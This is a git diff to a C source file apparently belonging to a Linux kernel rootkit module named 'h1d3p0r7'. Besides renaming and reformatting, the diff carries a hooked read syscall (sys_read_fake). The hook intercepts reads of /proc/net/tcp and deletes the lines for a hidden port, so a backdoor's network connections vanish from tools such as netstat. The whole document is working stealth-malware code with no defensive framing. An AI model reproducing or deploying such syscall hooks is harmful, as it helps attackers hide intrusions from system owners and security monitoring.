diff --git a/src/h1d3p0r7.c b/src/h1d3p0r7.c index f16e715..026f7b5 100644 --- a/src/h1d3p0r7.c +++ b/src/h1d3p0r7.c @@ -23,6 +23,11 @@ *******************************************************************************/ #include "h1d3p0r7.h" +/**** var ********************************************************************** +*******************************************************************************/ + +sys_read_ptr sys_read_orig; + /*******************************************************************************/ /*** FUNCTION **************************************************************** @@ -32,8 +37,8 @@ * RETURNS: *******************************************************************************/ -asmlinkage long hacked_read(unsigned int fd, char __user *buf, - size_t count) +asmlinkage long sys_read_fake(unsigned int fd, char __user *buf, + size_t count) { long result, bp, diff_in_bytes; char *kbuf, *start_line, *end_line, *port_num; @@ -43,47 +48,59 @@ asmlinkage long hacked_read(unsigned int fd, char __user *buf, struct path file_path; // run real read - result = (*orig_read)(fd,buf,count); - if (result <= 0) + result = (*sys_read_orig)(fd, buf, count); + + if (result <= 0){ return result; + } + - // get pathname - // CITATION [8] from report current_files = current->files; files_table = files_fdtable(current_files); file_path = files_table->fd[fd]->f_path; - pathname = d_path(&file_path,pbuf,256*sizeof(char)); - // if virtual file /proc/net/tcp - if (!strncmp(pathname,"/proc/",6) && !strcmp(pathname+10,"/net/tcp")) { - // copy from user to kernelspace; - if (!access_ok(VERIFY_READ,buf,result)) + pathname = d_path(&file_path, pbuf, 256*sizeof(char)); + + + if (!strncmp(pathname, "/proc/", 6) && !strcmp(pathname + 10, "/net/tcp")) { + + if (!access_ok(VERIFY_READ, buf, result)){ return -1; - if ((kbuf = kmalloc(result,GFP_KERNEL)) == NULL) + } + if ((kbuf = kmalloc(result, GFP_KERNEL)) == NULL){ return -1; - if (copy_from_user(kbuf,buf,result)) + } + if (copy_from_user(kbuf, buf, result)){ return -1; + } + - // filter out hidden ports - start_line = strchr(kbuf,':') - 4; // skip first line + start_line = strchr(kbuf, ':') - 4; diff_in_bytes = (start_line - kbuf) * sizeof(char); + for (bp = diff_in_bytes; bp < result; bp += diff_in_bytes) { + start_line = kbuf + bp; - port_num = strchr(strchr(start_line,':') + 1,':') + 1; - end_line = strchr(start_line,'\n'); + port_num = strchr(strchr(start_line, ':') + 1, ':') + 1; + end_line = strchr(start_line, '\n'); diff_in_bytes = ((end_line - start_line) + 1) * sizeof(char); - if (!strncmp(port_num,HIDE_PORT,4)) { // if magic port - memmove(start_line,end_line + 1, // delete line in file - result - bp - diff_in_bytes); + + if (!strncmp(port_num, DEFAULT_PORT_HEX, 4)) { + + memmove(start_line, end_line + 1, + result - bp - diff_in_bytes); + result -= diff_in_bytes; } } // copy from kernel to userspace - if (!access_ok(VERIFY_WRITE,buf,result)) + if (!access_ok(VERIFY_WRITE, buf, result)){ return EINVAL; - if (copy_to_user(buf,kbuf,result)) + } + if (copy_to_user(buf, kbuf, result)){ return EINVAL; + } kfree(kbuf); } // return number of bytes read